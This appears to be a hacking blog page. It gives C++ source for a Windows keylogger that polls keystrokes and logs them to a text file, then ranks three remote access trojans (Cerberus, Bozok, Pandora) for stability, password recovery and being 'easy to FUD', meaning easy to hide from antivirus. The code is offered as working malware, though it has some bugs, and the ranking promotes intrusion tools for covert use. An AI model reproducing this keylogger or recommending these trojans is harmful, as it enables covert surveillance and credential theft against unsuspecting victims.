C++ keylogger



#include <tchar.h>
#include <windows.h>
#include <iostream>
#include <windows.h>
#include <winuser.h>
#include <fstream>

int Save(int out)
{
    ofstream fout("abc.txt",ios::app);
   if (out==9)
    fout<<"\nTAB\n";
   else if (out==32)
    fout<<' ';
   else if (out==13)
    fout<<'\n';
   else if (out==16)
    fout<<"\nSHIFT\n";
   else if (out>=48&&out<=59)
    fout<<out-48;
   else if (out>=65&&out<=90)
    fout<<char(tolower(out));
    fout.close();
}

int main()
{
    char i;
    while (true)
        for (i=8 ; i<190 ; i++)
            if (GetAsyncKeyState(i)==-32767)
                Save(i);
    return 0;
}

Best RAT Software tested 2016

01. Cerberus RAT

These days this RAT is not popular but it is working all new Windows OS. Cerberus  is the best, it is stable and simple and powerful.

Cerberus RAT is the most stable ,most effective RAT ever used by me. It has small server (83k) and good plugins (568k).



Advantages:

  1. Coded in Delphi
    1. fast as C++ programmed
    2. No need framework
  2. Server small and plugin separated
  3. Stable
  4. Less memory using
  5. Less Processor using
  6. Working All windows
  7. Easy to FUD






02. Bozok RAT

this is also Delphi coded one and it is most fastest RAT ever made. it has  same features like other RATs but fast than others. every functions are fast in this rat.


Advantages:
  1. Coded in Delphi
    1. fast 
    2. No need framework
  2. Server small and plugin separated
    1. Server (33K)
    2. Plugins (268K)
  3. Stable
  4. Less memory using
  5. Less Processor using
  6. Good Simple UI
  7. Easy to FUD




03. Pandora RAT

Coded by Delphi. Fast and stable. Very rich functionality. Best user interface.


Advantages:
  1. Client coded in Delphi
    1. fast 
    2. No need framework
  2. Server coded in Delphi
    1. Server (656K)
    2. Plugins included
  3. Stable
  4. Less memory using
  5. Less Processor using
  6. Most perfect UI
  7. More functions with control panel
  8. Good password recovery
Disadvantages:

  1. Server is large (650Kb)
  2. Hard to FUD


Copyright © Source Code Hacking. Designed by Momizat Team. Powered to Blogger by SpicyTweaks.

Scroll to top